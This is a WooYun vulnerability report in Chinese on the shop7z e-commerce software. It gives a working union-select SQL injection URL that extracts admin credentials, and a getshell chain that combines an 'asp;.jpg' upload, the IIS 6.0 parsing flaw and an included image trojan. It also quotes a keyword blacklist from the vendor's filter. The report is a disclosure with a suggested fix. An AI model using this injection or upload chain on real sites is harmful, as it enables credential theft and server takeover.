当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-041416

漏洞标题:shop7z sql注入 后台上传可突破getshell

相关厂商:石家庄欣德网络科技有有限公司

漏洞作者: roker

提交时间:2013-10-30 14:48

修复时间:2013-12-14 14:49

公开时间:2013-12-14 14:49

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:10

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2013-10-30: 积极联系厂商并且等待厂商认领中,细节不对外公开
2013-12-14: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

sql注入

详细说明:

dataname.asp
path_back=LCase(request.servervariables("QUERY_STRING"))
if instr(path_back,"insert")<>0 or instr(path_back,"update")<>0 or instr(path_back,"delete")<>0
or instr(path_back,"(")<>0 or instr(path_back,"'")<>0 or instr(path_back," or ")<>0 or instr(path_back,"replace")<>0
or instr(path_back,"eval")<>0 then
response.write "<BR><BR><center>你的网址不合法</a>"


奇葩了。。不知他这么写和没过滤有什么区别。。
于是 看了下数据文件表的结构。。
exp : show.asp?pkid=4820%20and%201%20=%202%20union%20select%201,2,3,4,5,6,7,s_user,9,10,11,12,s_pwd,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38%20from%20admin
有两个上传的地方
一个是 ewebeditor
一个是他自己写的
ewebeditor只能上传jpg等正常文件,其他可以利用的都删了
看他自己写的上传。。虽然重命名了 ,可是后面却包含了原文件名
可以上传 2013xx.asp;.jpg格式的
利用iis6.0解析漏洞,本来以为这样就结束了。。
可是

set MyFile = server.CreateObject("Scripting.FileSystemObject")
set MyText = MyFile.OpenTextFile(Server.mappath(filename)) '读取文本文件
sTextAll = lcase(MyText.ReadAll())
MyText.close
set MyFile = nothing
sStr=".getfolder|.createfolder|.deletefolder|.createdirectory|.deletedirectory|eval|雷驰新闻发布|script|"
sStr=sStr&".saveas|wscript.shell|script.encode|server.|.createobject|execute|activexobject|language="
snum = split(sStr,"|")
for i=0 to ubound(snum)
if instr(sTextAll,snum(i)) then
set filedel = server.CreateObject("Scripting.FileSystemObject")
filedel.deletefile Server.mappath(filename)
set filedel = nothing
Response.Write("<script>alert('上传失败0!');window.close();</script>")
Response.End()
end if
next


对上传的文件内容进行了过滤,
可是 木有过滤 include~~
于是 在 ewebeditor处上传 图片格式 一句话, savaupload处上传 2013xxxxx.asp;.jpg格式的 包含 图片一句话木马的 路径,就可以得到shell啦~~

漏洞证明:

.jpg

.jpg

修复方案:

过滤 注入 后台 上传处机制改下,不要包含原名文件名

版权声明:转载请注明来源 roker@乌云


漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝